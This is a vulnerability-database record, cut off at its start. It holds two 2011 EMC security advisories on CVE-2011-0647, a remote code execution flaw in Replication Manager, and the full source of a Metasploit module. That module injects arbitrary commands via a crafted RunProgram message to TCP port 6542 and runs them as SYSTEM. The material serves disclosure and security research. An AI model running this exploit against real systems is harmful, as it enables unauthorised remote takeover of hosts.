remedies:\r\n\r\nRegistered EMC Powerlink customers can download software from Powerlink.\r\n \r\nFor NetWorker Module Software, navigate in Powerlink to Home &gt; Support &gt; Software Downloads and Licensing &gt; Downloads J-O &gt; NetWorker\r\nModule. \r\n\r\nBecause the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a\r\nsoftware download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045.\r\n\r\nCredits: EMC would like to thank an anonymous researcher working with TippingPoint&#39;s Zero Day Initiative\r\n&#40;http://www.zerodayinitiative.com&#41; for reporting this issue.\r\n\r\nFor explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends that all customers take into account\r\nboth the base score and any relevant temporal and environmental scores, which may impact the potential severity associated with particular\r\nsecurity vulnerability.\r\n\r\nEMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important\r\nsecurity information. EMC recommends all users determine the applicability of this information to their individual situations and take\r\nappropriate action. The information set forth herein is provided &quot;as is&quot; without warranty of any kind. EMC disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event\r\nshall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business\r\nprofits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the\r\nexclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\n\r\nEMC Product Security Response Center\r\nSecurity_Alert@EMC.com\r\nhttp://www.emc.com/contact-us/contact/product-security-response-center.htm\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;Cygwin&#41;\r\n\r\niEYEARECAAYFAk2TRAsACgkQtjd2rKp+ALzQPgCg16IfNvkKmL3PBKjwDaqcLdUe\r\nOIYAoInkqtn75kfeFISDeDiN6yBpZUxZ\r\n=bEH1\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-03-31T00:00:00", "published": "2011-03-31T00:00:00", "id": "SECURITYVULNS:DOC:26042", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26042", "title": "ESA-2011-012: Security update for EMC NetWorker Module for Microsoft Applications", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2011-0647"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2011-004: EMC Replication Manager remote code execution vulnerability\r\n\r\n\r\nEMC Identifier: ESA-2011-004\r\nCVE Identifier: CVE-2011-0647\r\n\r\n\r\nSeverity Rating: CVSS v2 Base Score: 9.3 &#40;AV:N/AC:M/Au:N/C:C/I:C/A:C&#41;\r\n\r\n\r\nAffected products:\r\nEMC Replication Manager earlier than 5.3\r\nEMC NetWorker Module for Microsoft Applications 2.1.x &#40;contains EMC\r\nReplication Manager&#41;\r\nEMC NetWorker Module for Microsoft Applications 2.2.x &#40;contains EMC\r\nReplication Manager&#41;\r\n\r\n\r\nVulnerability Summary:\r\nA vulnerability exists in EMC Replication Manager which may allow arbitrary\r\ncode execution on vulnerable installations of the EMC Replication Manager.\r\n\r\n\r\nVulnerability Details:\r\nEMC Replication Manager contains a potential vulnerability that may allow\r\nremote unauthenticated user to execute arbitrary code on vulnerable\r\ninstallations of the EMC Replication Manager.\r\n\r\n\r\nProblem Resolution:\r\nThe following EMC products contain resolutions to this issue:\r\n\r\n\r\nEMC Replication Manager 5.3 and later\r\n\r\n\r\nEMC strongly recommends that all customers upgrade to latest version of the\r\nproducts, which contain the resolution to this issue, at the earliest\r\nopportunity.\r\n\r\n\r\nNote on timing of this announcement:\r\n\r\n\r\nEMC developed a fix for this vulnerability which was released in Q3 2010 as\r\npart of a regular RM release 5.3. Because Networker Module for Microsoft\r\nNMM&#41; embeds RM code, NMM users were also determined to be vulnerable. NMM\r\nwill be releasing a fix for this vulnerability later this quarter &#40;Q1 2011&#41;,\r\nwhich will resolve the issue. To protect NMM users, EMC chose to not\r\nannounce the RM fix until now. EMC is now announcing in synchronization with\r\npublic disclosure by ZDI. EMC is unaware of any known exploits of this\r\nvulnerability.\r\n\r\n\r\nLink to remedies:\r\n\r\n\r\nRegistered EMC Powerlink customers can download software from Powerlink.\r\n\r\n\r\nFor Replication Manager Software, navigate in Powerlink to Home &gt; Support &gt;\r\nSoftware Downloads and Licensing &gt; Downloads P-R &gt; Replication Manager.\r\n\r\n\r\nBecause the view is restricted based on customer agreements, you may not\r\nhave permission to view certain downloads. Should you not see a software\r\ndownload you believe you should have access to, follow the instructions in\r\nEMC Knowledgebase solution emc116045.\r\n\r\n\r\nFor explanation of Severity Ratings, refer to EMC Knowledgebase solution\r\nemc218831. EMC recommends that all customers take into account both the base\r\nscore and any relevant temporal and environmental scores, which may impact\r\nthe potential severity associated with particular security vulnerability.\r\n\r\n\r\nCredits:\r\nEMC would like to thank an anonymous researcher working with TippingPoint&#39;s\r\nZero Day Initiative &#40;http://www.zerodayinitiative.com&#41; for reporting this\r\nissue.\r\n\r\n\r\nEMC Corporation distributes EMC Security Advisories in order to bring to the\r\nattention of users of the affected EMC products important security\r\ninformation. EMC recommends all users determine the applicability of this\r\ninformation to their individual situations and take appropriate action. The\r\ninformation set forth herein is provided &quot;as is&quot; without warranty of any\r\nkind. EMC disclaims all warranties, either express or implied, including the\r\nwarranties of merchantability, fitness for a particular purpose, title and\r\nnon-infringement. In no event shall EMC or its suppliers be liable for any\r\ndamages whatsoever including direct, indirect, incidental, consequential,\r\nloss of business profits or special damages, even if EMC or its suppliers\r\nhave been advised of the possibility of such damages. Some states do not\r\nallow the exclusion or limitation of liability for consequential or\r\nincidental damages so the foregoing limitation may not apply.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;Cygwin&#41;\r\n\r\niEYEARECAAYFAk1RU9wACgkQtjd2rKp+ALxmlACeKZG5lWael9gzPdEBORsFq/va\r\nS6MAoKxjl8ftuwuNBotq7UAv0jW0dSQO\r\n=nGSy\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-02-14T00:00:00", "published": "2011-02-14T00:00:00", "id": "SECURITYVULNS:DOC:25708", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25708", "title": "ESA-2011-004: EMC Replication Manager remote code execution vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-05-21T18:59:46", "description": "This module exploits a remote command-injection vulnerability in EMC Replication Manager client (irccd.exe). By sending a specially crafted message invoking RunProgram function an attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected products are EMC Replication Manager < 5.3. This module has been successfully tested against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested against these products.\n", "published": "2013-10-17T14:51:34", "type": "metasploit", "title": "EMC Replication Manager Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0647"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/EMC/REPLICATION_MANAGER_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'EMC Replication Manager Command Execution',\n 'Description' => %q{\n This module exploits a remote command-injection vulnerability in EMC Replication Manager\n client (irccd.exe). By sending a specially crafted message invoking RunProgram function an\n attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected\n products are EMC Replication Manager < 5.3. This module has been successfully tested\n against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft\n Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested\n against these products.\n },\n 'Author' =>\n [\n 'Unknown', #Initial discovery\n 'Davy Douhine' #MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-0647' ],\n [ 'OSVDB', '70853' ],\n [ 'BID', '46235' ],\n [ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],\n [ 'ZDI', '11-061' ]\n ],\n 'DisclosureDate' => 'Feb 07 2011',\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Payload' =>\n {\n 'Space' => 4096,\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n # Tested on Windows XP and Windows 2003\n [ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ]\n ],\n 'CmdStagerFlavor' => 'vbs',\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 5\n },\n 'DefaultTarget' => 0,\n 'Privileged' => true\n ))\n\n register_options(\n [\n Opt::RPORT(6542)\n ])\n end\n\n def exploit\n execute_cmdstager({:linemax => 5000})\n end\n\n def execute_command(cmd, opts)\n connect\n hello = \"1HELLOEMC00000000000000000000000\"\n vprint_status(\"Sending hello...\")\n sock.put(hello)\n result = sock.get_once || ''\n if result =~ /RAWHELLO/\n vprint_good(\"Expected hello response\")\n else\n disconnect\n fail_with(Failure::Unknown, \"Failed to hello the server\")\n end\n\n start_session = \"EMC_Len0000000136<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><ir_message ir_sessionId=0000 ir_type=\\\"ClientStartSession\\\" <ir_version>1</ir_version></ir_message>\"\n vprint_status(\"Starting session...\")\n sock.put(start_session)\n result = sock.get_once || ''\n if result =~ /EMC/\n vprint_good(\"A session has been created. Good.\")\n else\n disconnect\n fail_with(Failure::Unknown, \"Failed to create the session\")\n end\n\n run_prog = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?> \"\n run_prog << \"<ir_message ir_sessionId=\\\"01111\\\" ir_requestId=\\\"00000\\\" ir_type=\\\"RunProgram\\\" ir_status=\\\"0\\\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>\"\n run_prog << \"<ir_runProgramAppInfo>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; &lt;ir_message ir_sessionId=&quot;00000&quot; ir_requestId=&quot;00000&quot; \"\n run_prog << \"ir_type=&quot;App Info&quot; ir_status=&quot;0&quot;&gt;&lt;IR_groupEntry IR_groupType=&quot;anywriter&quot; IR_groupName=&quot;CM1109A1&quot; IR_groupId=&quot;1&quot; \"\n run_prog << \"&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?\t&amp;gt; &amp;lt;ir_message ir_sessionId=&amp;quot;00000&amp;quot; \"\n run_prog << \"ir_requestId=&amp;quot;00000&amp;quot;ir_type=&amp;quot;App Info&amp;quot; ir_status=&amp;quot;0&amp;quot;&amp;gt;&amp;lt;aa_anywriter_ccr_node&amp;gt;CM1109A1\"\n run_prog << \"&amp;lt;/aa_anywriter_ccr_node&amp;gt;&amp;lt;aa_anywriter_fail_1018&amp;gt;0&amp;lt;/aa_anywriter_fail_1018&amp;gt;&amp;lt;aa_anywriter_fail_1019&amp;gt;0\"\n run_prog << \"&amp;lt;/aa_anywriter_fail_1019&amp;gt;&amp;lt;aa_anywriter_fail_1022&amp;gt;0&amp;lt;/aa_anywriter_fail_1022&amp;gt;&amp;lt;aa_anywriter_runeseutil&amp;gt;1\"\n run_prog << \"&amp;lt;/aa_anywriter_runeseutil&amp;gt;&amp;lt;aa_anywriter_ccr_role&amp;gt;2&amp;lt;/aa_anywriter_ccr_role&amp;gt;&amp;lt;aa_anywriter_prescript&amp;gt;\"\n run_prog << \"&amp;lt;/aa_anywriter_prescript&amp;gt;&amp;lt;aa_anywriter_postscript&amp;gt;&amp;lt;/aa_anywriter_postscript&amp;gt;&amp;lt;aa_anywriter_backuptype&amp;gt;1\"\n run_prog << \"&amp;lt;/aa_anywriter_backuptype&amp;gt;&amp;lt;aa_anywriter_fail_447&amp;gt;0&amp;lt;/aa_anywriter_fail_447&amp;gt;&amp;lt;aa_anywriter_fail_448&amp;gt;0\"\n run_prog << \"&amp;lt;/aa_anywriter_fail_448&amp;gt;&amp;lt;aa_exchange_ignore_all&amp;gt;0&amp;lt;/aa_exchange_ignore_all&amp;gt;&amp;lt;aa_anywriter_sthread_eseutil&amp;gt;0&amp\"\n run_prog << \";lt;/aa_anywriter_sthread_eseutil&amp;gt;&amp;lt;aa_anywriter_required_logs&amp;gt;0&amp;lt;/aa_anywriter_required_logs&amp;gt;&amp;lt;aa_anywriter_required_logs_path\"\n run_prog << \"&amp;gt;&amp;lt;/aa_anywriter_required_logs_path&amp;gt;&amp;lt;aa_anywriter_throttle&amp;gt;1&amp;lt;/aa_anywriter_throttle&amp;gt;&amp;lt;aa_anywriter_throttle_ios&amp;gt;300\"\n run_prog << \"&amp;lt;/aa_anywriter_throttle_ios&amp;gt;&amp;lt;aa_anywriter_throttle_dur&amp;gt;1000&amp;lt;/aa_anywriter_throttle_dur&amp;gt;&amp;lt;aa_backup_username&amp;gt;\"\n run_prog << \"&amp;lt;/aa_backup_username&amp;gt;&amp;lt;aa_backup_password&amp;gt;&amp;lt;/aa_backup_password&amp;gt;&amp;lt;aa_exchange_checksince&amp;gt;1335208339\"\n run_prog << \"&amp;lt;/aa_exchange_checksince&amp;gt; &amp;lt;/ir_message&amp;gt;&lt;/IR_groupEntry&gt; &lt;/ir_message&gt;</ir_runProgramAppInfo>\"\n run_prog << \"<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>\"\n run_prog_header = \"EMC_Len000000\"\n run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog\n\n vprint_status(\"Executing command....\")\n sock.put(run_prog_packet)\n sock.get_once(-1, 1)\n\n end_string = Rex::Text.rand_text_alpha(rand(10)+32)\n sock.put(end_string)\n sock.get_once(-1, 1)\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/emc/replication_manager_exec.rb"}]}